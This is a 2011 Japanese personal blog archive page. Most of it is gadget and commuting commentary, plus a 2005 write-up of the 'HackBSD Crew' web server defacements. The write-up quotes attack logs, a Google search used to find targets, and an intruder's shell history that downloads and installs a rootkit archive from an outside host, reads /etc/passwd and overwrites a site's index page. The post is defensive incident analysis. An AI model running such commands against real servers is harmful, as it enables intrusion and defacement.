« 2011年6月 | トップページ | 2011年8月 »

2011年7月

2011.07.22

iPod nanoは小さすぎ、電子書籍は流行っているのか?

時間がなくて以下の記事にタイムリーに反応できずじまいでしたが...
電子ガジェットものへの感想とか。

■電子書店戦国時代へ ドコモ参入、主要5陣営出そろう
 http://www.asahi.com/business/topics/economy/TKY201101110552.html

なんか去年あたりに電子書籍がトレンドっぽくなってましたが、いざ2011年の今の状況で、
まず私の周りで電子書籍のためにスマホ導入...な人はまだ居ません。
電車の中でも、iPhoneが一番見かけて、ドコモアンドロイド携帯ときどき、
iPadや他社タブレットはたまーに見かける程度です(有楽町線や京浜東北線あたりの通勤で)
端末があってもプレイしているのは、WEB閲覧やメールが多いようです。
電車の中では、書籍を読んでる人はスマホ&タブレットの2割以下な印象。
今日2011/7/22に初めてSONYロゴな端末を見かけました。あれがreaderか。
ipadはでかいので電車では目立ちますが、自炊っぽい技術書画像をめくって読んでいる場合が多い。
図や数式が多い勉強用書籍は電子で買うより、
既存の紙をスキャンしたほうが手っ取り早いのかな。
7月になって、シャープガラパゴスがLinuxやめてアンドロイドOSに変更できる発表が。
書籍リーダー専用機という肩書きを早々に降ろして諦めるのか。
それだけ売れ行きは良くないのかなと勘ぐってしまいます。
これじゃあ他社タブレットと変わらなくなりますね。


■ウォークマンとiPodのシェア逆転、要因は「新型iPod nano」
 http://www.itmedia.co.jp/news/articles/1101/13/news082.html
同じ「ナノ」シリーズでも、今のモデルは小さすぎると思います。
いい音出す回路とか、バッテリとかメモリ容量とか考えると
あまり小さすぎるとそういうのが犠牲になっているのだと思う。
というか名刺の半分しか無いと「持ちづらい」。名刺サイズのnanoが良かったのに。
有人も今年にipod買いましたが、わざわざ前のモデルを探して買ったくらい。
同人なら蒼樹うめ先生も去年の同人誌で前のモデルのほうを買ったと語ってもいました。理由は大きさ。
私はウォークマン派です。性能悪くないと思うのですがappleに勝てませんねぇ。


■docomoからメッセージRでクーポン
9月30日までの期限で、機種変更したら3000円、旧機種を下取りに出したら5000円の
合計8000円のクーポンをメッセージRで配信してました。
現金でなくて、ドコモポイントのようですが。
(マイショップからの配信有効にしてれば来るかも)
ただ、機種の下取りの条件が
・電池がちゃんとあること
・過去に購買履歴が記録されてる機種であること
・このメッセージが着ている電話番号に対応する機体であること
・間近に購入したもの
4番目の条件だと一番古くない機種を手放すことに。
FOMAは買い増しという表現で、古い機種を捨てずにSIM差し替えで使えるので
古い機種も使えるので、一人で何台か保有できるのですが
そこで一番新しい旧機種しか下取りしてくれないのか?


■学研「電子ブロック」アプリのiPad版を無料公開、回路図もいろいろ用意
 http://internet.watch.impress.co.jp/docs/news/20110331_436292.html

7月先日にniftyがニフティサーブの昔のパソコン通信を再現するアプリを配布してましたが、
擬似的に通信して懐かしんでどうしろというのだろうか...
しかもその再現度がイマイチでGOコマンドや電子フォーラムコマンドで
ほとんど何も表示検索できない。WEBでいろいろ試したのですが。
つまらなかった。
ニフティは今年になって、動画共有、RSSリーダなどいろいろサービス廃止縮小してます。
その上、nifty-serveの昔のネタを展開なんて、栄枯盛衰盛者必衰の理をあらはすよう。
話し逸れましたが、私は電子ブロックは181回路まで拡張しましたよ。
http://cba.sakura.ne.jp/ex/ex181.htm
壊れたパーツは通販で取り寄せてましたが、当時は長崎に住んでいて秋葉原には遠いので
長崎では有名な電気のカホで部品買って、自前でハンダ付したり。
懐かしいなあ。これもエミュレータでなく実機で配線するのに趣があるかと。

| | トラックバック (0)

2011.07.21

豊洲:駅混雑とスカイツリー

(2011.7.21追記)
■豊洲駅相変わらずひどい

昨年来の駅工事はまだ続いていて終わりません。
相変わらず出口が一箇所なので朝の8~9時台は大混雑。
上り下り同時到着だと激混みです。
さらに豊洲駅から乗車する流れとぶつかって改札口付近は歩きにくいです。
よほどコミックマーケットのほうが整流統制されててマシかと。
豊洲に住んでいるくらいのブルジョアならマイカーとか自家用ジェットで通勤してくださいよ...
と思うくらいに(笑)。
つか、途中の階段の増設はどうでもいいので、早く出口1つだけなのを増やして欲しい。
一年経ってもなぜ増えない。
増えたところで、6a出口(東雲方面海側)への集中が緩和されるんだろうか。
出口は逆方向に増えるだけなんだし。
東雲方面なら5番出口もそうなんだけど、オフィスが海側にビル乱立してて陸側はマンションだからか、6a出口にばかり人が集まるんですよ。
6a出口を広くして欲しい。またはトンネルを延長して複数出口に分散して欲しいものです。
とにかく人口に対して駅が小さすぎる。
これでもまだ駅近所は空き地があって、築地市場の移転もまだなのだからそれが開発されると...
有楽町線豊洲駅混雑

■地下鉄有楽町駅

あと、
今年2011年は時どきに地下鉄有楽町駅の中央改札でエスカレータ故障が多い。
そのために朝のラッシュ時に中央が使えずに他の出入口に人が集まって、中に入るのも行列で待たされる。
有楽町駅ホームも狭いよね、利用規模に対して。狭いから待ち行列がちゃんと並び切れていない。
一度作ってしまうと変更はできないだろうしなあ。でもなんとかしてほしい。
そういえば、最近にホームの白線の外側に円マークが多数ある。
あれはホームドアを設置する穴なのだろう。それができると端っこまで進出できそう。
(ホームドアはホーム利用範囲を狭くするのでなく、柵ができるのでもっと端まで人が出て行っていいようになるので広く使える?)


(2010.9初版)
■有楽町線豊洲駅の混雑はひどい

この数年で街はかなり発展してます。まだ空き地あるのでまだ建物が増えるのか?
そんな活気のある豊洲に再び勤務してますが、弊害も見えてきました。
朝の駅の混雑がひどい。地下風で暴風が駆け抜けるのもあきれますが(技術的にどうにかならんのだろうか)、人がすごく増えて、駅は混雑して朝はそれでぐったりです。
階段をぎゅうぎゅうで登っていくのは、コミケかと思えるくらい。
エスカレータも少ないし。中央改札エスカレータは小さいの1基だけだし。
それで最悪なのは改札が1箇所しか無いこと。利用数に対して少ない!
数年前に改札機は増やしたが、中央改札の台数を増やしただけ!
で、
2010年現在は出口の数自体を増やす工事中です。
しかし朝の行列を見ると、みんな東方面に向かっている。
ビルもそっちに多いし、西のららぽーとには少ない。
既に中央改札が東にあることから、他の改札ができてもそれの利用者は少ないのでは、みんな結局中央に殺到するのでは...と私は懸念しています。
駅の中の人は、私よりちゃんと考えてくれているんだよね....


■スカイツリーが見える

豊洲からは北東にスカイツリーが見えます。毎日少しずつながら伸びているのを見るのが楽しいです。
塔の中央は空洞なのはよくあるけど、その空間を利用して、最上部のアンテナタワーを組み立て、完成後に一気に引き上げて塔の上に載せるというアイデアはおもしろい。
超高層で雨風にさらされながら建築するのは大変ですからね。
その最上部がにょきっと出てくる日が楽しみですが、今も少しずつ伸びています。
スカイツリー 初音ミク タイムマシン

壁紙はこちら。
40メートルP楽曲、ぎた氏のイラストいいですね>新曲『タイムマシン』、164さん合作で1640メートル!(笑)


■関連記事
2006.10.14 豊洲:アーバンドックららぽーと
http://ntd.way-nifty.com/blog/2006/10/post_9994.html

| | トラックバック (0)

2011.07.12

『HackBSD Crew』とPHPやwebdav脆弱性と帆場暎一

(2011.7.12追記)
先日のニュースで、ソフバンの通信網がバグでなく意図的に異常動作して犯人逮捕のニュース、
すぐに発動せずに、犯人が会社を離れてからなんて、
機動警察パトレイバー劇場版1の帆場暎一を思い出したのですが、
http://temple-knights.com/archives/2011/07/softbank-network-down-Inside-job.html
やはり皆さんもそうでしたか(笑)。
しかし、プログラムの無謬性は、どのように保証担保されるのか?
複雑で高度なシステムになると、レビューや監査や検収でバグすら見逃すのに、恣意的に組み込まれ意識して隠蔽されてるウイルスなロジックを防げるだろうか。
作る奴のほうが検収する側よりプログラミング優秀だから作っているわけで。
そういうのを防ぐためにオープンソースがありますが、REDHATのように自力コンパイルが面倒でバイナリを買うような時代ですし、
膨大なLinuxの全ソースを監視できているのかな?>リーナス・トーバルズさん
OSSに対して、帆場なら元ソースにはウイルスを表示させないで、コンパイラリンカを便利に見せかけてシェアを獲得し、そこにウイルス仕込んでたりしそう。


(2005/10/17)
■Windows版HackBSDだとphpは関係無い?

2005年8月23日から数日間に国内で集中発生した「hackbsd crew」は8割方が「windows2000&IIS5」という組み合わせでした。
改竄情報サイトにもphpが動作してたとは記載がない。
そこでこのバージョンの組み合わせならば、win版hackbsd改竄はマイクロソフトのwebdavの脆弱性を突かれている可能性があります。特に2K&IIS5はやばかったですし。(2003年には既知な脆弱性だった)
win版『HackBSD Crew侵入』はこういうところを突かれたのかも。
WEBDAV自体は拡張httpなのでUNIXでも組み込まれているでしょうが、UNIXならPHP経路侵入なのでしょうか。
被害にあったところから伺った、webDAVを突いて侵入する手口は、
・侵入者のクライアントがUNIXコマンドライン型WebDAVクライアントcadaver/Neonを名乗っている
 (UAにcadaver/Neonと表示されている)
・webDAVをサーバで有効にしているぐらいの無防備IISだと、書込もeveryone属性になっているだろうから、OSの権限を乗っ取らずともリモートからIISでファイルをputしてしまうらしい。
というわけで、この場合は侵入原因としてPHPは関係ないことになります。
まぁ、まともな?クラックツールならあらゆる脆弱性を試す仕掛けになっているでしょうから、Windowsへの侵入にはwebDAVでない方法も悪用されることでしょう。
いずれにしても、新たな脆弱性を突いたわけではなく、2003年あたりから既に知られている手法で今なお侵入されている場合がほとんどのようです>サーバ書き換え事件


(2005/8/30追加)
情報元サイトのドイツ語訳をコメントにいただきました。ありがとうございます。
しかし現在も相変わらず改竄されている国内の半分はwin版ですが、こっちはどういう被害(書き換え&削除)なのでしょう。
世間的にニュースにならないからこのまま淡々と?さみだれ的に改竄され、各所で慌てて個別対処な流れなのでしょうか。


(元本文)
2005/8/23あたりに国内で多く被害が出ているので情報まとめ。
Windows系セキュリティアラートだとネットニュースや総務省から全国への注意喚起も(マイクロソフトの代理店か?と思えるくらいに)行われていますが、PHPのこうした情報はどこにアナウンスされているのだろう?
見つけきれずに自分で集めたので折角だから記録。

■トラブル事象
WEBサーバがリモートからクラックされ、html改ざんや内部ファイルの削除をされてしまう。

■トラブル詳細

日本での初出は2004年から既にあったようですが
www.zone-h.org
2005/8/23に特に多発したサーバ改ざんが『HackBSD Crew 0wnz You @ [g0d]』。
これはHackBSDとしてのcrew以外にも亜種があります。サーバの乗っ取りに成功すると、
WWWルートディレクトリ直下に「/hackbsd.html」という犯行声明を残していく。
文面は、以下のようなもの。

 HackBSD Crew 0wnz You @ [g0d]
 Whe are not Criminals, Looking for one?, Go to the white house!
 eu.undernet.org #hackbsd
 Whe are: EL_S0MBRA,dope|man,bebo,jsz,jank0,[g0d],RockyCroW

■攻撃の手口

これがなかなか情報が見つからない。
検索でもHACKBSDにクラックされたサーバを単に晒す情報しか見当たらず。
情報の元をたどって、サイトを見つけました。
どうもここが詳細に症状をレポートしてるらしいのですが、ドイツ語なので読めない…
http://haftbar.de/2005/08/11/hackbsd-crew-0wnz-y0u-jank0

■攻撃を受けるソフトウェア?
Serendipity Weblog (serendipity_xmlrpc.php)
Drupal (xmlrpc.php)
TikiWiki (xmlrpc.php)
phpMyFAQ (xmlrpcs.php)
Wordpress < 1.5
phpAdsNew
eGroupware (not yet verified)
phpGroupware (not yet verified)

■攻撃を受けたときの(関係するらしい)httpログ
230.xx - - [09/Aug/2005:19:52:41 +0200]
 "POST /xmlrpc.php HTTP/1.0" 200 524 "-" "-"
200.88.29.xx - - [10/Aug/2005:04:15:35 +0200]
 "GET /~manaus/wp-login.php HTTP/1.1" 200 1339 "http://www.google.com.do/search?q=allinurl%3A+%2Fwp-login.php+site%3Ade&hl=es" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.88.29.xx - - [10/Aug/2005:04:15:36 +0200]
 "GET /~manaus/wp-admin/wp-admin.css HTTP/1.1" 200 6074 "http://haftbar.de/~manaus/wp-login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.88.29.xx - - [10/Aug/2005:04:15:38 +0200]
 "GET /~manaus/wp-images/wp-small.png HTTP/1.1" 200 1416 "http://haftbar.de/~manaus/wp-login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.88.29.xx - - [10/Aug/2005:04:15:43 +0200]
 "GET /~manaus/xmlrpc.php HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
218.234.2.xx - - [10/Aug/2005:04:16:00 +0200]
 "POST /~manaus/xmlrpc.php HTTP/1.1" 200 139 "-" "-"
218.234.2.xx - - [10/Aug/2005:04:16:06 +0200]
 "POST /~manaus/xmlrpc.php HTTP/1.1" 200 113 "-" "-"
218.234.2.xx - - [10/Aug/2005:04:16:24 +0200]
 "POST /~manaus/xmlrpc.php HTTP/1.1" 200 76 "-" "-"

■侵入突破されたあとのtelnetログ
wget freewebs.com/REMOVED/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4;./setup 0ri0n 6000
cat /etc/passwd
passwd postgres
cd /home/manaus/public_html;ls
rm xml*
cd /var/www;ls
cd haftbar.de;ls
cd htdocs;ls
echo hackbsd Crew 0wnz y0u! @ jank0 >index.php;
rm xm*
cd /tmp;
rm *.txt killall -9 r0nin.txt

以上を自己勝手に解釈させて書かせていただきますと↓下のような流れ

■PHPが稼動しているサーバが狙われる。
国内セキュリティ監視ニュースサイト↓
JPドメインWeb改竄速報 http://izumino.jp/Security/def_jp.html
これらの改ざんでの共通点は、
Microsoft-IIS/5.0&Windows2000、または、Apache/1.3.31 PHP/4.3.8 Linux
OSよりもPHPであるかどうかが重要?

■PHPが稼動しているかのping-aliveのため「wp-login.php」を手がかりにしている
今年2005年5月の価格.comの騒動ではSQLインジェクションが話題でしたが、あの時それよりも多く被害が出ていたのはphpBBの脆弱性を突かれたサーバ改ざんでした。
その時の手口が『PHPサーバを探すためにgoogleを利用し、Powered by phpBB Version…の文字列を含むサイトを探してから攻撃に入る』というものでした。
(これは既に去年の段階で、Googleを利用し.ASP .JSP .PHP .PHTM .SHTMあたりを探し回る手口のワームがあったようです)
これと同じように、今回は、
http://www.google.co.jp/search?complete=1&hl=ja&c2coff=1&q=allinurl%3A%2Fwp-login.php+site%3Ajp&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=
このように「allinurl:/wp-login.php site:jp」で目星をつけていたようです。

■httpポート経由でPOSTやGETをPHPに仕掛けてクラックする?
サーバを見つけるとPHPへリクエスト攻撃するわけですが、
なぜここでOSの管理者権限が乗っ取られるかが不明です。
HackBSDを名乗る手口自体は2004.12時点で既出ですが、今回が同じ痕跡名でも侵入手法が同一かは断言できません。
単に未パッチ放置だったサイトばかりであれば手法は古典的なままなのかもしれませんし、乗っ取り部分だけ新型なのかもしれませんし。

■乗っ取られたあとは…いろいろやられ放題?
もっとひどい悪さをできそうですが『HackBSD Crew』では犯行声明ページで
『Whe are not Criminals』と主張してます。が、
それと並行して、UNIX系の場合は、
一部のファイルのremove、passwdファイルの書き換え、freewebs.com/REMOVED/shv4.tar.gzをダウンロードしてそれのsetupをやってるようです。
(shv4.tar.gzはかなり古いexploitsのアーカイブでアングラにごろごろあるクラックツール)
あとwin2k+IISの環境でも侵入されています。こっちもコマンドラインとかバッチで自動的にサーバ内を好き勝手しているのでしょうが、UNIXのhisのようにコマンド履歴が残っているかどうかが怪しい(IISでやられた事例ログを収集中ですが見当たらず)。それに痕跡をも削除するマクロなのがデフォでしょうし。
そのため手掛かりが少なく手口解明がより難しいかもしれません>win版PHPの場合。
shv4.tar.gzがwinでは動きませんから別の何かを仕掛ける手口かもしれませんし。

■echoでhackbsd声明文ファイルをサイトに蔵置する
「ファイルの蔵置」は公用な表現ですが、これによりやられたことが判るわけです。
改竄サイトを検出している所はよくまぁ見つけますね??

■ドイツのそのレポサイトによればバックドアも仕掛ける?
「telnet backdoor port 1666」ともあります。

今回の攻撃も既知の脆弱性を相変わらず突いたものであるならば、
ネットには無防備&放置なサーバがまだまだ多いということでしょうか。
先のgoogle検索では300件ぐらいヒットしますので、まだまだ攻撃は続くかも?
(2011年に検索してもまだヒットする...この中に相変わらず無防備な作りのがあるのか)
とりあえず過去(2004年)の乗っ取り手法を調べたのですが、検索してみて日経BPに技術的な手口解説の記事がありました。
(引用元は英語ばかりで国内から発信されてないようです)
この時のPhpInclude.Worm(Santy.e)というワームはPHPの関数「Include()」や「Require()」を不適切に使うことで発生する「File Inclusion Flaw」現象を悪用する。よってセキュリティホールというよりSQLインジェクションのようにプログラム設定ミスを突いたものでした。よって広範囲のPHPが該当したそうです。
PHPを狙うワームが出現,Webページのプログラム・ミスを突く 2004.12
記事にあるようにすぐ亜種が出現し、セキュリティホールも攻撃する複合タイプも出現しているため、最新のセキュアな状態に維持し続けることが肝要と思われます。

アドバイザリで2004年12月のPHP脆弱性解説を見つけましたが、英文です。
http://secunia.com/advisories/13481/
その後はPHPに関しては2005年4月にDoSを受ける脆弱性が報告されてますが、
現在は特に何もアドバイザリは出ていません。>PHP
となると、一番のhackBSDの原因は新手の攻撃でなく、この2004年12月の脆弱性が残っているに過ぎない?

| | コメント (2) | トラックバック (1)

« 2011年6月 | トップページ | 2011年8月 »